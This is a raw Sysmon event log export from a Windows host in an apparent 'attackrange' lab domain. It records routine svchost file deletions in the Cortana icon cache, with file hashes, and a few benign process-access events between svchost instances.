23542300x80000000000000005171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{D7779C65-D55A-4E6E-AB28-222AD101D61C}MD5=9001B10995D8FDABC78945D7B210649D,SHA256=92818CA4F5FB7F3808ABFDE9EFED7E2292FBE9195366132EDB50F3A246CA00B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{CAD3CFB0-7CDE-43F8-B95D-98E958A585B7}MD5=41ABD480C1392D97DF3ACFFE760D2804,SHA256=7BEF858DA7D8B87F8E4C7804731E91AF5618DF4838EFC2BE398F609078268479,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{C5DABA0D-CF94-465F-9B6B-C598EE8CCEE8}MD5=DEAC14151C0C509293EEE44191D9CD8D,SHA256=A169AF78E7C013538AE66FC03A2B859A0D6D4F5D5F77BFF03415E9C25084B430,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{BBD6B771-DF9C-48D4-99BF-77C177FAAD05}MD5=ED16924B1B7A952B1CB20D8515BEBB70,SHA256=6966D629DD24B6904DB8AA9C9F06197706E039848C15BE8FA738E4ED25F06B0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=019055B3C33F2D1C157E94A14AD44BB5,SHA256=6E5472FCADCA41C68C60DCD7108A27487FCDC2CE3352D78C8C3893525CA7B4CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{B69C64CD-23EC-43CB-8DAE-EB6560EAACC3}MD5=A461B8A48DB3B6C08E072140728A43C4,SHA256=21C57136A790877DA3640B5691C0F651D503D133B2B6936F5203BEE3F30A9565,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{B59BA0CB-7100-4018-A4F9-D539D5F4E058}MD5=DA594A38AD299ADA683372EBA5881CAD,SHA256=F0529ED98871CFB5607C993309D0A3DDB84CE36EC2E41897CB6BD8EB683711CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{B4D06CEE-9D19-4A4D-B72A-396F2B566927}MD5=5F0A30B2DC6750BA2867B7BC006BD8FB,SHA256=9051D648449406B051B8A06D3372962529004EE159132D437E89AB6AEFA8A880,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{B14CA865-C958-4580-9074-7E92964475FC}MD5=73252311BC2FB738EA33277A28F3596B,SHA256=7B6EA44D32065F717612C79F94114F9259C08D5465EBC007F16AEA92FD4D1CEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{B0DD03EF-8C20-43DB-BDD2-4CFAB623574E}MD5=74017CA605E121CBA7CF92459B8C5638,SHA256=A4B6642597D4E32EB8FAC89CB4450E226C3978F963BDBFE95ECCAA527F1E8EAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{AD913853-B212-444B-9876-3E2C3A49A8EB}MD5=206A73951B8654BD2B70962A78C00BE1,SHA256=19DA4F01CBB9BFDD977E06AF58B95CEC1D4A027C776A178469251B5F0B9D9A3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{A5400422-73B1-4B93-91A9-72E697208472}MD5=00B94F495BD57E421FEF46D7A1EECF44,SHA256=3C1C7F8A819B758DAD75031F99AEF06C94B418FA2FC199F82BFAE815483E11C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{A4E61E50-3EF0-4DA6-8275-CD489D676DAB}MD5=2BA0F2705632CB30D7BCA6DF8D087F2D,SHA256=7E47070E9ED1DFB752DD755B918F943B0B231C0885F55DF05EE82470595E3022,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.569{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{9D07DE99-52F7-454A-8CE6-31DA9AA94ED8}MD5=9456CEECAC6A1245C482C3B82593846D,SHA256=963DE82340F63CFB27DFDD15CD5643FE93D6C0AADB0B96B7923F0E23815F10CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{98C2D61D-6107-43E9-BCD8-6EB83D77ADEF}MD5=60FFAC14CA2196E3D54342C4C45F7C2B,SHA256=9979DFF1E142B348644E5C7735FCD13D8871408DCF4E0913D9FD9A3EC8436C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{9485A429-81C2-4352-A24F-92682A765D4B}MD5=349FE67C44E950D305D486C590998F2B,SHA256=B5832863667B94E5D9380583C2B626BC6969F8C9D362D2241F99C57ED5A4B157,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{8D75FAE0-23F9-47DE-A54A-C2427D45DCAC}MD5=DEAC14151C0C509293EEE44191D9CD8D,SHA256=A169AF78E7C013538AE66FC03A2B859A0D6D4F5D5F77BFF03415E9C25084B430,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{8AB7F553-0827-496F-B610-82D31E06AC96}MD5=A2C26EBC40D4625D952314673C6141E9,SHA256=902AC55382C57835ED2151549B7D12211436E67A63B3B0E44FB384A661228729,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{891D5E7A-7A57-4CBF-9089-443EE49B6103}MD5=911DEFC897CECC2D0C78E5B96D5D515B,SHA256=965BD9A6F5738140EB5A51EFBC44129112C25FC82825BA7F30113602A6E8C902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{891649DE-3DE4-49E5-90AC-0987EA95353B}MD5=05F75F6404996B3E39476104E78DF209,SHA256=1E4258113A2D151783ADB9D626D38E7F67CFAB9C79FE14B27E07170081D145C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{84B49252-6DEC-40A8-90BE-86AE577E1B23}MD5=55F95E08D08A7A3768F27800D9217B04,SHA256=37F9BC821FDE92326D617E96AA6ADB2DBE7EB2666B1A88451F9410B80A774377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.554{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{829BE0F1-69E1-42FD-A3B6-359E1C3C1345}MD5=B467C6E316631A8A0420CB9F40222D93,SHA256=55336E857424336DBC05D5B2B96AEAAE4D296B1D6D5B031A5869B25143624085,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.538{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{80A3BBAD-ABC2-4C9D-86E6-B04FA287F655}MD5=4174344A2D19128BADE81E2EB14BDC1D,SHA256=FC6C1C04EE333CB336B7DC428C25B995F7B85F49ADBDC88EBC7262C1307885FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.538{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{74B164BF-3E71-46AF-8ACB-AAA4A76A5378}MD5=349FE67C44E950D305D486C590998F2B,SHA256=B5832863667B94E5D9380583C2B626BC6969F8C9D362D2241F99C57ED5A4B157,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.538{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{735E8BE6-1731-42CA-A8F3-B53E930EDCDB}MD5=18E3CA8C6CCA69E00EC76747FAB81F0B,SHA256=08148891128E558A6C3CD3EEEE68457F3D1A10F1A2720DE0A4E27D1543A4F785,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.538{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{72CE2732-257D-4200-8BC3-7ABC84224683}MD5=854754F8D9E7F7D9AAF2FA7F6BE1A1EF,SHA256=E6F4EFACF3E1CAD20C8245C7B9408E2BE2C2D6FD70B781F48A4BA22F067ED731,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.538{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D1CC60E-42DB-4A1B-A50C-DC1DF51BFBF1}MD5=5E74B43DD59C1AB6F5244DA6154DDEB4,SHA256=DB8971C2F98690196197BC5A5875D3233E0FBC7B512BFA60659E67D5296FE080,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.538{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6A253CE4-5CE2-4926-BF13-2F00787D2097}MD5=D9E99905D3D6FB42429AAF5DE84FCADA,SHA256=B8359F6E6BC9E16731B65A9F8253C86E846E9C1F951B1351CBD649FA6E286BC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{552E6613-D145-4B51-A24E-3C8B003E24A4}MD5=C359A6183B25EF8221256AFEDCE656B8,SHA256=E9122C2C02DEBBB1AFF1FBFE30465AFAA0CFBD4EAE9C10AEA58A6663DEE9EE8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{526402D0-291F-4761-931C-0273D14B2CF0}MD5=0CE681BD1598F07606E87609151DC42A,SHA256=1334CF9557C973A9F6AF7280C8C165C434A24947DE6E1647B27E62CB822FF31A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{4FC5BD42-2CCF-4A96-AD8E-C83520ADB20F}MD5=922CD9F5F7320A813B0DAC1080EB7709,SHA256=346145F9100D8CA04CE7FC277D8775DF500D1FD1995F6CE28BBEEF685DFF04DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{4E171B62-A785-4231-B14E-626B192185F0}MD5=0796DDBF4C9B9D94DC5FD03E92485F28,SHA256=DBC10BA43AA770F1D3A36F7CAC2B50AE664804F28214B792E3C56266D7E8F377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{4CC3BE49-DBA3-470D-94C8-20CE40F2BCAA}MD5=164DF3D6F46E23E2FA08C9D8B57D071C,SHA256=2CEAF005435274273EB097157EA09E468BCD39ED9A7D63ECD04A0C6986B1528C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{4CA8F3BE-4DEC-4028-BAEF-6491FC4270C3}MD5=68F587A5B93845BD54716A6C6C932688,SHA256=3A319B5FA81F068C11959C024D08DADF279A00CA5C6B8C3F574C4DB64822AD56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{4975E0B9-496B-4FF0-BC0E-1E06B22BDD96}MD5=C8B4FC8B8745BDE84005D690D3A026B2,SHA256=8779E3A2B6294AED675906209B8CD86FE1A79E0D3770AED38600278C29E6E55E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.523{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{48A82B41-50A4-42D7-B403-B5D5FC29426F}MD5=164DF3D6F46E23E2FA08C9D8B57D071C,SHA256=2CEAF005435274273EB097157EA09E468BCD39ED9A7D63ECD04A0C6986B1528C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 